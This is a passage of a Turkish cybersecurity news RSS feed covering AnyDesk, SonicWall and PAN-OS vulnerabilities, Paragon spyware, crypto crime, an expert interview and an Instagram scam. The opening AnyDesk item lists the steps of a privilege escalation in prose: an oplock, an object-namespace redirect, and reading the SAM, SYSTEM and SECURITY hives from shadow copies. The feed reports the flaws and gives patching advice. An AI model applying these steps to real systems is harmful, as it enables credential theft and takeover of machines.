<p data-start="1381" data-end="1816">Düşük yetkili bir kullanıcı, masaüstü arka planını değiştirerek hangi dosyanın <code data-start="1460" data-end="1477">C:\Windows\Temp</code> dizinine kopyalanacağını kontrol edebilir. Ancak, bu kopyalama işlemi sonucunda yeni dosya yalnızca sistem yöneticileri ve NT AUTHORITY\SYSTEM tarafından okunabilir hale geliyor. Bu sınırlamayı aşmak için, saldırgan aynı ada sahip bir dosyayı önceden <code data-start="1729" data-end="1746">C:\Windows\Temp</code> dizinine yerleştirebilir ve bu sayede kopyalanan veriye erişebilir.</p>
<p data-start="1818" data-end="2065">Ayrıca, Windows'un otomatik olarak oluşturduğu <strong data-start="1865" data-end="1893">HarddiskVolumeShadowCopy</strong> (Gölge Kopyalar) mekanizmasından yararlanılarak sistem dosyalarına erişim sağlanabiliyor. Saldırganlar, aşağıdaki adımları izleyerek yerel ayrıcalıklarını yükseltebilir:</p>
<ol data-start="2067" data-end="2472">
<li data-start="2067" data-end="2148"><code data-start="2070" data-end="2087">C:\Windows\Temp</code> klasöründe hedef dosya adıyla önceden bir dosya oluşturma.</li>
<li data-start="2149" data-end="2216">Oplock (Dosya Kilidi) kullanarak kopyalama işlemini tetikleme.</li>
<li data-start="2217" data-end="2305">Arka plan görüntüsünün bulunduğu klasörü NT Object Manager Namespace'e yönlendirme.</li>
<li data-start="2306" data-end="2397"><strong data-start="2309" data-end="2316">SAM</strong>, <strong data-start="2318" data-end="2328">SYSTEM</strong> ve <strong data-start="2332" data-end="2344">SECURITY</strong> dosyalarına erişmek için gölge kopyaları kullanma.</li>
<li data-start="2398" data-end="2472">Elde edilen verileri kullanarak yönetici ayrıcalıklarını ele geçirme.</li>
</ol>
<p data-start="2474" data-end="2506"><strong data-start="2474" data-end="2504">Zafiyetin Açıklanma Süreci</strong></p>
<p data-start="2508" data-end="2880">Bu güvenlik açığı, 24 Temmuz 2024'te AnyDesk geliştiricilerine bildirildi. Trend Micro'nun <strong data-start="2599" data-end="2628">Zero Day Initiative (ZDI)</strong> programı kapsamında takip edilen süreç sonunda, 19 Aralık 2024'te kamuoyuna duyuruldu. Açığın CVE ve ZDI detaylarına şu bağlantıdan ulaşılabilir:<br data-start="2774" data-end="2777"><strong data-start="2780" data-end="2878"><a data-start="2782" data-end="2876" rel="noopener" target="_blank" href="https://www.zerodayinitiative.com/advisories/ZDI-24-1711/">Detay linki</a></strong></p>
<p data-start="2882" data-end="3052">Güvenlik açığının kötüye kullanılmasını önlemek için AnyDesk kullanıcılarının güncellemeleri takip etmeleri ve sistem güvenlik ayarlarını gözden geçirmeleri öneriliyor.</p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SonicWall güvenlik açığı saldırıya uğradı: PoC exploit sonrası tehdit büyüyor</title>
            <link>https://cumha.com.tr/sonicwall-guvenlik-acigi-poc-exploit-sonrasi-saldirilar-artti</link>
            <guid>https://cumha.com.tr/sonicwall-guvenlik-acigi-poc-exploit-sonrasi-saldirilar-artti</guid>
            <description><![CDATA[ SonicWall güvenlik duvarlarında tespit edilen kritik bir güvenlik açığı (CVE-2024-53704), PoC exploit kodunun yayınlanmasının ardından siber saldırganlar tarafından aktif olarak istismar ediliyor. Uzmanlar, acil güncelleme yapılması gerektiği konusunda uyarıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67afd65ea3845.webp" length="34066" type="image/webp"/>
            
            <pubDate>Sat, 15 Feb 2025 10:49:25 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>SonicWall güvenlik açığı hangi cihazları etkiliyor, PoC exploit sonrası saldırılar nasıl arttı, kaç cihaz risk altında, SonicWall kullanıcıları ne yapmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="400" data-end="760">Siber güvenlik uzmanları, SonicWall güvenlik duvarlarında bulunan kritik bir güvenlik açığının (CVE-2024-53704) tehdit aktörleri tarafından aktif olarak kullanıldığını doğruladı. Özellikle SSLVPN kimlik doğrulama mekanizmasını etkileyen bu açık, saldırganların kimlik doğrulama gereksinimini atlayarak hedef ağlara yetkisiz erişim sağlamasına olanak tanıyor.</p>
<p data-start="762" data-end="836"><strong data-start="762" data-end="834">Saldırılar, PoC exploit kodunun yayınlanmasının ardından hız kazandı</strong></p>
<p data-start="838" data-end="1146">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) tarafından kritik olarak sınıflandırılan güvenlik açığı, SonicOS'in 7.1.x (7.1.1-7058 sürümüne kadar), 7.1.2-7019 ve 8.0.0-8035 sürümlerini etkiliyor. Bu sürümler, Gen 6 ve Gen 7 güvenlik duvarları ile SOHO serisi cihazlarda yaygın olarak kullanılıyor.</p>
<p data-start="1148" data-end="1456">SonicWall, güvenlik açığını gidermek için 7 Ocak'ta güvenlik güncellemeleri yayınladı ve müşterilerine acil güncelleme yapmaları konusunda uyarıda bulundu. Güncelleme yapamayanlar için ise cihaz erişiminin yalnızca güvenilir kaynaklarla sınırlandırılması ve internetten erişimin tamamen kesilmesi önerildi.</p>
<p data-start="1458" data-end="1787">Ancak, 10 Şubat’ta Bishop Fox güvenlik araştırmacıları tarafından yayınlanan Proof-of-Concept (PoC) exploit kodu, saldırganların güvenlik açığını nasıl kullanabileceklerini açıkça gösterdi. Bu kodun yayınlanmasının ardından Arctic Wolf siber güvenlik şirketi, saldırı girişimlerinde hızlı bir artış tespit ettiklerini açıkladı.</p>
<p data-start="1789" data-end="1829"><strong data-start="1789" data-end="1827">4.500’den fazla cihaz risk altında</strong></p>
<p data-start="1831" data-end="2177">Bishop Fox araştırmacılarının 7 Şubat’ta yaptığı internet taramalarına göre, halen 4.500'den fazla SonicWall SSL VPN sunucusunun güvenlik açığına karşı korumasız olduğu belirlendi. Şirket, bu cihazların saldırganlar için kolay hedef haline geldiğini belirterek, yöneticilerin en kısa sürede güvenlik yamalarını uygulaması gerektiğini vurguladı.</p>
<p data-start="2179" data-end="2429">Daha önce Akira ve Fog fidye yazılımı gruplarının SonicWall güvenlik duvarlarını hedef aldığı biliniyor. Arctic Wolf’un Ekim ayında yayınladığı bir rapora göre, en az 30 siber saldırının SonicWall VPN hesapları üzerinden başlatıldığı tespit edildi.</p>
<p data-start="2431" data-end="2638">Uzmanlar, SonicWall kullanıcılarının derhal cihazlarını güncelleyerek güvenlik açıklarını kapatmaları gerektiğini belirtiyor. Güncelleme mümkün değilse, SSLVPN hizmetinin devre dışı bırakılması öneriliyor.</p>
<p data-start="2640" data-end="2654"><strong data-start="2640" data-end="2652"></strong></p>
<p></p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Palo Alto Networks PAN-OS’ta Kimlik Doğrulama Açığını Kullanan Saldırılar Artıyor</title>
            <link>https://cumha.com.tr/palo-alto-networks-pan-os-kimlik-dogrulama-acigi-saldiri</link>
            <guid>https://cumha.com.tr/palo-alto-networks-pan-os-kimlik-dogrulama-acigi-saldiri</guid>
            <description><![CDATA[ Siber saldırganlar, Palo Alto Networks PAN-OS güvenlik duvarlarını hedef alarak yakın zamanda düzeltilen yüksek riskli CVE-2025-0108 açığını kullanıyor. Bu güvenlik açığı, kimlik doğrulamayı atlayarak yetkisiz erişime olanak tanıyor. Uzmanlar, sistem yöneticilerini acilen güncelleme yapmaya çağırıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67afcb9078251.webp" length="28420" type="image/webp"/>
            
            <pubDate>Sat, 15 Feb 2025 10:03:27 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Palo Alto Networks PAN-OS güvenlik açığı nedir, hangi sürümler etkileniyor, saldırılar nasıl gerçekleşiyor, sistem yöneticileri hangi önlemleri almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="444" data-end="485"><strong data-start="444" data-end="483">PAN-OS yönetim arayüzü risk altında</strong></p>
<p data-start="487" data-end="903">Siber saldırganlar, Palo Alto Networks PAN-OS güvenlik duvarlarında tespit edilen ve kısa süre önce yamalanan CVE-2025-0108 güvenlik açığını kullanarak kimlik doğrulama sürecini atlatıyor. Bu güvenlik açığı, yüksek risk seviyesine sahip olup PAN-OS’un yönetim web arayüzünü etkiliyor. Ağ içindeki yetkisiz saldırganlar, belirli PHP betiklerini çalıştırarak sistemin bütünlüğünü ve gizliliğini tehlikeye atabiliyor.</p>
<p data-start="905" data-end="1046">Palo Alto Networks, 12 Şubat’ta yayımladığı güvenlik bülteninde sistem yöneticilerini derhal aşağıdaki sürümlere yükseltme yapmaya çağırdı:</p>
<ul data-start="1048" data-end="1157">
<li data-start="1048" data-end="1074">11.2.4-h4 veya sonrası</li>
<li data-start="1075" data-end="1101">11.1.6-h1 veya sonrası</li>
<li data-start="1102" data-end="1129">10.2.13-h3 veya sonrası</li>
<li data-start="1130" data-end="1157">10.1.14-h9 veya sonrası</li>
</ul>
<p data-start="1159" data-end="1409">PAN-OS 11.0 sürümünün de güvenlik açığından etkilendiği ancak kullanım ömrünü tamamladığı için herhangi bir güvenlik güncellemesi almayacağı belirtildi. Bu nedenle, bu sürümü kullananların desteklenen bir sürüme geçmeleri şiddetle tavsiye ediliyor.</p>
<p data-start="1411" data-end="1451"><strong data-start="1411" data-end="1449">Güvenlik araştırmacılarından uyarı</strong></p>
<p data-start="1453" data-end="1861">CVE-2025-0108 güvenlik açığı, siber güvenlik şirketi Assetnote araştırmacıları tarafından tespit edilerek Palo Alto Networks’e bildirildi. Araştırmacılar, açığın yamalanmasının ardından yayımladıkları teknik raporda, saldırganların bu zafiyeti kullanarak hassas sistem verilerini çıkarabileceğini, güvenlik duvarı yapılandırmalarını görüntüleyebileceğini veya belirli ayarları değiştirebileceğini gösterdi.</p>
<p data-start="1863" data-end="2056">Saldırganların, PAN-OS üzerindeki Nginx ve Apache sunucuları arasındaki yol karmaşasından faydalandığı ve bu yöntemle kimlik doğrulamayı atlayarak sisteme erişim sağlayabildiği tespit edildi.</p>
<p data-start="2058" data-end="2097"><strong data-start="2058" data-end="2095">Saldırı girişimleri hızla artıyor</strong></p>
<p data-start="2099" data-end="2397">Siber tehdit izleme platformu GreyNoise, yamalanmamış PAN-OS sistemlerini hedef alan saldırı girişimlerini kaydetti. 13 Şubat 17.00 UTC itibarıyla başlayan saldırıların, farklı IP adreslerinden geldiği ve birden fazla tehdit aktörünün bu açığı istismar etmeye çalıştığını gösterdiği belirtiliyor.</p>
<p data-start="2399" data-end="2572">Ayrıca, Macnica güvenlik araştırmacısı Yutaka Sejiyama, dünya genelinde halen 4.400’den fazla PAN-OS cihazının yönetim arayüzünü internete açık durumda tuttuğunu açıkladı.</p>
<p data-start="2574" data-end="2597"><strong data-start="2574" data-end="2595">Savunma önerileri</strong></p>
<p data-start="2599" data-end="2848">Uzmanlar, saldırıların devam edeceğini ve açığın kamuya açık bir şekilde paylaşıldığı göz önüne alındığında istismar girişimlerinin önümüzdeki günlerde daha da artacağını belirtiyor. Bu tehdide karşı alınması gereken önlemler şu şekilde sıralandı:</p>
<ul data-start="2850" data-end="3039">
<li data-start="2850" data-end="2893">Güvenlik yamalarının derhal uygulanması</li>
<li data-start="2894" data-end="2953">Güvenlik duvarı yönetim arayüzüne erişimin kısıtlanması</li>
<li data-start="2954" data-end="3039">Yetkisiz ağ erişiminin önlenmesi için ek güvenlik kontrollerinin devreye alınması</li>
</ul>
<p data-start="3041" data-end="3204">Güvenlik açığının istismar edilmesi durumunda sistemlerin ciddi tehlikeye girebileceği belirtilirken, yetkililerin hızla harekete geçmesi gerektiği vurgulanıyor.</p>
<p data-start="3206" data-end="3375"><strong data-start="3206" data-end="3218"></strong></p>
<p></p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İtalyan hükümeti: 'Paragon casus yazılımı Avrupa genelinde vatandaşları hedef aldı'</title>
            <link>https://cumha.com.tr/italyan-hukumeti-paragon-casus-yazilimi-avrupa-genelinde-vatandaslari-hedef-aldi</link>
            <guid>https://cumha.com.tr/italyan-hukumeti-paragon-casus-yazilimi-avrupa-genelinde-vatandaslari-hedef-aldi</guid>
            <description><![CDATA[ İtalya hükümeti, WhatsApp tarafından ortaya çıkarılan bir casus yazılım kampanyasında Paragon Solutions tarafından geliştirilen yazılımın Avrupa&#039;daki birçok ülkedeki kullanıcıları hedef aldığını açıkladı. İtalyan gazeteci Francesco Cancellato ve aktivist Luca Casarini&#039;nin de hedefler arasında olduğu iddia edilirken, hükümet suçlamaları reddetti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67afb5ce04ebd.webp" length="18510" type="image/webp"/>
            
            <pubDate>Sat, 15 Feb 2025 08:30:15 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Paragon casus yazılımı hangi ülkelerde kullanıldı, İtalya&#039;da kaç kişi hedef alındı, WhatsApp casus yazılımı nasıl tespit etti, Paragon Solutions bu iddialara nasıl yanıt verdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>İtalyan hükümeti, WhatsApp tarafından ortaya çıkarılan bir casus yazılım kampanyasında Paragon Solutions'un geliştirdiği bir yazılımın Avrupa genelinde vatandaşları hedef aldığını duyurdu. Açıklama, hükümetin çarşamba günü yaptığı basın duyurusuyla kamuoyuna bildirildi.</p>
<p>Hükümet, söz konusu casus yazılımın İtalya'da gazeteci Francesco Cancellato ve aktivist Luca Casarini’yi de hedef aldığı iddialarını reddetti. Cancellato, haber sitesi Fanpage.it'nin baş editörü olarak görev yaparken, Casarini ise göçmenlere yardım eden sivil toplum kuruluşu Mediterranea Saving Humans için çalışıyor.</p>
<p><strong>Hedef alınan ülkeler arasında birçok Avrupa ülkesi var</strong></p>
<p>İtalya Ulusal Siber Güvenlik Ajansı (ACN), WhatsApp ve şirketin hukuk firması Advant ile temasa geçtiğini ve İtalya'da en az yedi kişinin casus yazılımın hedefi olduğunu belirlediğini açıkladı. Ancak WhatsApp, gizlilik gerekçesiyle bu kişilerin kimliklerini paylaşmayı reddetti.</p>
<p>WhatsApp tarafından aktarılan bilgilere göre, Avusturya, Belçika, Kıbrıs, Çekya, Danimarka, Almanya, Yunanistan, Letonya, Litvanya, Hollanda, Portekiz, İspanya ve İsveç gibi birçok Avrupa ülkesinde de benzer hedeflemeler yapıldı.</p>
<p>WhatsApp, İtalya hükümetinin iddiaları hakkında doğrudan bir yanıt vermezken, daha önce yaptığı açıklamada 90 kişinin bu casus yazılımdan etkilendiğini ve bunun dünya çapında iki düzineden fazla ülkeyi kapsadığını belirtti.</p>
<p><strong>Paragon Solutions suçlamaları reddetti</strong></p>
<p>Paragon Solutions, salı günü yaptığı açıklamada casus yazılım teknolojisini yalnızca ABD hükümeti ve diğer "müttefik" ülkelere sattığını belirtti. Şirket, kullanıcıların gazeteciler ve sivil toplum temsilcilerini hedef almasını yasaklayan katı kullanım şartlarını kabul ettiğini ve bu kuralları ihlal eden müşterileriyle ilişkisini keseceğini duyurdu.</p>
<p>Ancak İtalya hükümetinin açıklamasında adı geçen ülkelerin gerçekten Paragon’un müşterisi olup olmadığına dair şirketten doğrudan bir yanıt gelmedi.</p>
<p>İtalya Ulusal Siber Güvenlik Ajansı ve başbakanlık ofisi, konuyla ilgili yorum yapmaktan kaçındı.</p><br><p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kripto Suçlarında 2024 Rekoru: Dolandırıcılık ve Siber Saldırılar Zirvede</title>
            <link>https://cumha.com.tr/2024-kripto-suclarinda-rekor-dolandiricilik-ve-fidye-yazilimi-zirvede</link>
            <guid>https://cumha.com.tr/2024-kripto-suclarinda-rekor-dolandiricilik-ve-fidye-yazilimi-zirvede</guid>
            <description><![CDATA[ Küresel kripto piyasası 2024&#039;te büyümesini sürdürürken, suç örgütleri de dijital varlıkları daha sofistike yöntemlerle kullanmaya başladı. Yasa dışı kripto işlemleri 45 milyar dolara ulaşırken, dolandırıcılık ve fidye yazılım saldırıları rekor seviyelere çıktı. Siber suçluların yapay zeka ve blockchain teknolojilerini kullanarak faaliyetlerini artırması, güvenlik açıklarını derinleştirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67af12104ea50.webp" length="104466" type="image/webp"/>
            
            <pubDate>Fri, 14 Feb 2025 20:57:18 +0300</pubDate>
            <dc:creator>Ali Öztürk</dc:creator>
            <media:keywords>Kripto suçları 2024&#039;te ne kadar arttı, fidye yazılım saldırıları hangi seviyeye ulaştı, kripto dolandırıcılığının toplam maliyeti ne kadar oldu, yasa dışı kripto işlemleri hangi ülkelerde yoğunlaştı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="530" data-end="931"><strong data-start="530" data-end="576">Kripto Suçları 2024'te Yeni Zirveye Ulaştı</strong><br data-start="576" data-end="579">2024 yılı, kripto piyasasının hızlı büyümesine rağmen dijital suçların da endişe verici seviyelere yükseldiği bir yıl oldu. Küresel kripto piyasasının toplam işlem hacmi 10,6 trilyon doları aşarken, yasa dışı faaliyetlerin de arttığı gözlemlendi. TRM Labs’ın 2025 Kripto Suç Raporu’na göre, yasa dışı işlemlerin toplam değeri 45 milyar dolara ulaştı.</p>
<p data-start="933" data-end="1399"><strong data-start="933" data-end="985">Dolandırıcılıkla Bağlantılı İşlemler Rekor Kırdı</strong><br data-start="985" data-end="988">Blockchain analiz firması Chainalysis’in raporuna göre, kripto dolandırıcılıklarından elde edilen gelir rekor seviyeye ulaştı. Siber suçlular, yapay zeka destekli sahte yatırım fırsatları ve deepfake teknolojileriyle dolandırıcılığı daha inandırıcı hale getirdi. 2024'te dolandırıcılıkla bağlantılı cüzdanlara toplamda 9,9 milyar dolar aktarıldı. Yıl sonunda bu rakamın 12,4 milyar dolara ulaşması bekleniyor.</p>
<p data-start="1401" data-end="1786"><strong data-start="1401" data-end="1441">Fidye Yazılım Saldırıları Yükselişte</strong><br data-start="1441" data-end="1444">Fidye yazılım saldırıları 2024'te tarihindeki en yüksek seviyeye ulaştı. Küresel çapta 5 bin 600’den fazla saldırı gerçekleşirken, fidye ödemeleri rekor kırdı. Dark Angels adlı bir grup, tek bir saldırıda 75 milyon dolar fidye aldı. Çin, Japonya, Güney Kore ve Hindistan başta olmak üzere finans sektöründe büyük güvenlik ihlalleri yaşandı.</p>
<p data-start="1788" data-end="2127"><strong data-start="1788" data-end="1839">Kripto Borsaları Siber Saldırıların Hedefi Oldu</strong><br data-start="1839" data-end="1842">Kripto borsalarına yönelik siber saldırılarda da artış yaşandı. 2024 yılı boyunca hacker grupları tarafından 2,2 milyar dolar değerinde dijital varlık çalındı. Kuzey Kore merkezli hacker grupları, yalnızca Asya merkezli borsalardan 800 milyon dolarlık yasa dışı işlem gerçekleştirdi.</p>
<p data-start="2129" data-end="2524"><strong data-start="2129" data-end="2201">Uyuşturucu Ticareti ve Yaptırımlardan Kaçışta Kripto Kullanımı Arttı</strong><br data-start="2201" data-end="2204">Kripto para birimleri, uyuşturucu ticaretinde ve yasa dışı fon transferlerinde etkin bir şekilde kullanılmaya devam etti. Asya'daki isyancı grupların blockchain ağları üzerinden izlenmesi zor para transferleri yaptığı bildirildi. Özellikle USDT gibi stabil kripto paraların yasa dışı işlemlerde kullanımı dikkat çekti.<br><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Uzmanı Osman Doğan: 'Siber Güvenlik Hayatta Kalmanın Tek Yolu'</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmani-osman-dogan-siber-guvenlik-bir-luks-degil-hayatta-kalmanin-tek-yolu</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmani-osman-dogan-siber-guvenlik-bir-luks-degil-hayatta-kalmanin-tek-yolu</guid>
            <description><![CDATA[ Siber Güvenlik Uzmanı Osman Doğan, 2024 yılında sahada tespit edilen güvenlik açıklarını ve yaşanan hack vakalarını değerlendirdi. Yetki kısıtlamaları, bütçe yetersizlikleri, sızma testlerinin eksikliği ve güvenlik mekanizmalarındaki zafiyetler, kurumları ciddi risklerle karşı karşıya bırakıyor. Doğan, siber güvenliğin bir lüks değil, dijital dünyada hayatta kalmanın tek yolu olduğunu vurguladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67a513bbd246a.webp" length="47738" type="image/webp"/>
            
            <pubDate>Fri, 07 Feb 2025 07:06:40 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Siber güvenlik uzmanı Osman Doğan hangi risklere dikkat çekti, 2024’te en çok karşılaşılan güvenlik açıkları neler, sızma testleri neden yeterli değil, siber güvenlik tüm çalışanları neden ilgilendiriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber güvenlik alanında 2024 yılı, birçok kurum için büyük tehditlerle karşı karşıya kalınan bir yıl oldu. Bu kapsamda sahada tespit edilen güvenlik açıkları ve yaşanan siber saldırılarla ilgili değerlendirmelerde bulunan <a href="https://www.gaissecurity.com/" target="_blank" rel="noopener">Gais Security</a> CEO'su Osman Doğan organizasyonlardaki yapısal eksikliklere dikkat çekti.</p>
<p><strong>Siber güvenlik birimlerinin yetkileri kısıtlı</strong><br>Osman Doğan, birçok kurumda siber güvenlik birimlerinin organizasyon içerisindeki yetkilerinin kısıtlı olduğunu belirterek, 'Riskleri minimize edecek önlemler alınamıyor, çünkü siber güvenlik ekiplerinin yeterli otoriteye sahip olması engelleniyor' dedi.</p>
<p><strong>Bütçe ve insan kaynağı yetersizliği büyük sorun</strong><br>Doğan, siber güvenlik departmanlarına ayrılan bütçelerin yetersiz olduğunu ve bu durumun insan kaynağı eksikliğiyle birleşerek güvenlik açıklarını daha da artırdığını ifade etti. 'Firmalar, artan siber tehditlere rağmen yeterli bütçeyi ve uzman kadroyu ayırmıyor' şeklinde konuştu.</p>
<p><strong>Sızma testleri yetersiz kalıyor</strong><br>Siber güvenlik uzmanı, birçok organizasyonun yılda yalnızca bir kez sızma testi yaptırmasının yeterli olmadığını vurguladı. 'Dijital varlıklar sürekli gelişiyor, ancak firmalar güvenlik testlerini düzenli hale getirmediği için büyük riskler doğuyor' dedi.</p>
<p><strong>DevSecOps süreçlerinde ciddi eksiklikler var</strong><br>Doğan, güvenli yazılım geliştirme süreçlerinde ciddi eksiklikler bulunduğunu belirterek, 'Otomatize ve manuel testlerin yetersizliği, güvenlik açıklarının önceden tespit edilmesini engelliyor' ifadelerini kullandı.</p>
<p><strong>Veri sızıntıları ve içeriden gelen tehditler tespit edilemiyor</strong><br>Osman Doğan, mevcut güvenlik açıklarının yalnızca dış tehditlerden ibaret olmadığını, içeriden gelen tehditlerin ve veri sızıntılarının da ciddi bir sorun oluşturduğunu söyledi. 'Birçok kurum, yaşanan veri ihlallerini sosyal medya veya üçüncü taraf kaynaklardan öğreniyor' dedi.</p>
<p><strong>Zararlı yazılımlar ve güvenlik çözümlerindeki eksiklikler</strong><br>Şirket çalışanlarına gönderilen dökümanlarda bulunan zararlı yazılımların, mevcut güvenlik çözümlerindeki eksiklikler veya yanlış konfigürasyonlar nedeniyle tespit edilemediğini belirten Doğan, 'Bu hatalar, saldırganların sistemlere erişimini kolaylaştırıyor' ifadelerini kullandı.</p>
<p><strong>Bulut sistemlerde yapılandırma hataları yaygın</strong><br>Cloud tabanlı sistemlerde yapılan yapılandırma hataları, yanlış network segmentasyonları ve eksik erişim kontrol mekanizmalarının büyük güvenlik riskleri oluşturduğunu belirten Doğan, şirketlerin bu konuda daha dikkatli olması gerektiğini söyledi.</p>
<p><strong>Siber güvenlik bir kültür haline gelmeli</strong><br>Osman Doğan, siber güvenliğin sadece ilgili departmanların sorumluluğunda olmaması gerektiğini belirterek, 'Şirketlerin güvenlik farkındalığını tüm çalışanlarına yayması gerekiyor. Siber güvenlik bir lüks değil, dijital dünyadaki savaşta hayatta kalmanın tek yoludur' dedi.</p>
<p></p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Instagram Reklamları Üzerinden Yeni Dolandırıcılık Yöntemi: Kullanıcı Bilgileri Hedefte</title>
            <link>https://cumha.com.tr/instagram-reklamlari-uzerinden-yeni-dolandiricilik-yoentemi-kullanici-bilgileri-hedefte</link>
            <guid>https://cumha.com.tr/instagram-reklamlari-uzerinden-yeni-dolandiricilik-yoentemi-kullanici-bilgileri-hedefte</guid>
            <description><![CDATA[ Ebubekir Bastama&#039;nın paylaştığı videoya göre, dolandırıcılar Instagram reklamlarını kullanarak USOM adıyla güven kazanıp, mağdurların kişisel ve finansal bilgilerini ele geçiriyor. Sahte &#039;siber saldırı mağdurlarına yardım&#039; iddiasıyla yayılan bu yöntem büyük risk taşıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202502/image_870x_67a2db59f169e.webp" length="27420" type="image/webp"/>
            
            <pubDate>Wed, 05 Feb 2025 14:26:26 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Instagram&#039;da yeni dolandırıcılık yöntemi nedir, USOM adı dolandırıcılıkta nasıl kullanılıyor, Instagram sahte formlarla nasıl veri topluyor, sosyal medya dolandırıcılığı nasıl önleni</media:keywords>

                            <content:encoded>
                                            <![CDATA[<section>
<h2>Dolandırıcılık Yöntemi Nasıl İşliyor?</h2>
<p>Sosyal medya platformları üzerinden yayılan dolandırıcılık yöntemlerine bir yenisi eklendi. <strong>Ebubekir Bastama</strong>, YouTube kanalında yayınladığı <a href="https://www.youtube.com/watch?v=cTWZQ6YatjY" target="_blank" rel="noopener">videoda</a>, Instagram’da sahte videolu reklamlarla kullanıcıları kandıran yeni bir dolandırıcılık tekniğini detaylandırdı.</p>
</section>
<section>
<h2>Dolandırıcılar Hangi Yöntemleri Kullanıyor?</h2>
<h3>USOM Adı Kullanılarak Güven Kazanılıyor</h3>
<p>Dolandırıcılar, Türkiye’de siber güvenliği izleyen <strong>Ulusal Siber Olaylara Müdahale Merkezi’nin (USOM)</strong> adını kullanarak, siber saldırıya uğrayan kişilere yardım edeceklerini iddia ediyor. Ancak amaç, mağdurların <strong>kişisel ve finansal bilgilerini ele geçirmek</strong>.</p>
<h3>Instagram Üzerinden Bilgi Toplama Tuzağı</h3>
<p>Dolandırıcılar, Instagram’da sahte bir <strong>"Instagram İletişim Formu"</strong> üzerinden şu bilgileri talep ediyor:</p>
<ul>
<li><strong>Ne kadar para kaybettiniz?</strong> (Yaklaşık bir miktar belirtilmesi isteniyor.)</li>
<li><strong>Bu kayıp ne zaman gerçekleşti?</strong> (Ay ve yıl bilgisi talep ediliyor.)</li>
<li><strong>Olayın detaylarını paylaşın.</strong> (Dolandırıcılık yöntemi, işlem detayları ve şirket adı gibi bilgiler isteniyor.)</li>
<li><strong>İletişim bilgileri:</strong> Ad, soyad, e-posta ve telefon numarası talep ediliyor.</li>
</ul>
</section>
<section>
<h2>Dolandırıcılar Nasıl Filtreleri Aşıyor?</h2>
<h3>Sosyal Medyada Güvenilir Görünme Çabası</h3>
<p>Sahtekarlar, Instagram’ın dolandırıcılıkla ilgili filtrelerini atlatmak için çeşitli teknikler kullanıyor. <strong>Standart dolandırıcılık yöntemlerinden farklı olarak, resmi görünümlü bir form ile veri topluyorlar</strong> ve mağdurlara güven vermek amacıyla <strong>videolu reklamlar</strong> kullanıyorlar.</p>
<h3>Ebubekir Bastama’dan Uyarı</h3>
<p><strong>Ebubekir Bastama</strong>, bu tür sahte reklamlara ve formlara <strong>kesinlikle bilgi girilmemesi</strong> gerektiğini vurguluyor. Ayrıca, sosyal medya platformlarında karşılaşılan benzer şüpheli içeriklerin <strong>ilgili platform yetkililerine bildirilmesi gerektiğini</strong> belirtiyor.</p>
</section>
<section>
<h2>Dolandırıcılıktan Korunmak İçin Ne Yapılmalı?</h2>
<h3>Alınması Gereken Önlemler</h3>
<ul>
<li><strong>Resmi kurumlardan geldiği iddia edilen duyuruların doğruluğu kontrol edilmeli.</strong></li>
<li><strong>Bilinmeyen bağlantılar ve formlar doldurulmamalı.</strong></li>
<li><strong>Instagram ve diğer sosyal medya platformlarının resmi destek kanalları kullanılmalı.</strong></li>
<li><strong>Şüpheli reklamlar ilgili platformlara bildirilerek yayılması engellenmeli.</strong></li>
<li><strong>Kesinlikle sosyal medya reklamlarına kişisel veya finansal bilgiler verilmemeli.</strong></li>
<li><strong>Bilinçli olalım, sosyal medyada paylaşılan her bilgiye güvenmeden önce araştırma yapalım.</strong></li>
</ul>
</section>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Instagram’da Kritik Güvenlik Açığı: Hesap Bilgilerinizi Çaldırmayın!</title>
            <link>https://cumha.com.tr/instagramda-kritik-guvenlik-acigi-hesap-bilgilerinizi-caldirmayin</link>
            <guid>https://cumha.com.tr/instagramda-kritik-guvenlik-acigi-hesap-bilgilerinizi-caldirmayin</guid>
            <description><![CDATA[ Instagram’ın yetkilendirme URL’sinde tespit edilen bir güvenlik açığı, saldırganların sahte mesajlarla kullanıcıları tuzağa düşürmesine olanak sağlıyor. Saldırganlar, Instagram alan adı üzerinden &quot;Hesabınız hacklenmiştir&quot; gibi mesajlar göstererek sahte bir bağlantıya yönlendiriyor ve hesap bilgilerinizi ele geçirmeyi hedefliyor. Kullanıcıların şüpheli bağlantılara tıklamaması ve URL’leri dikkatle kontrol etmesi öneriliyor. ]]></description>

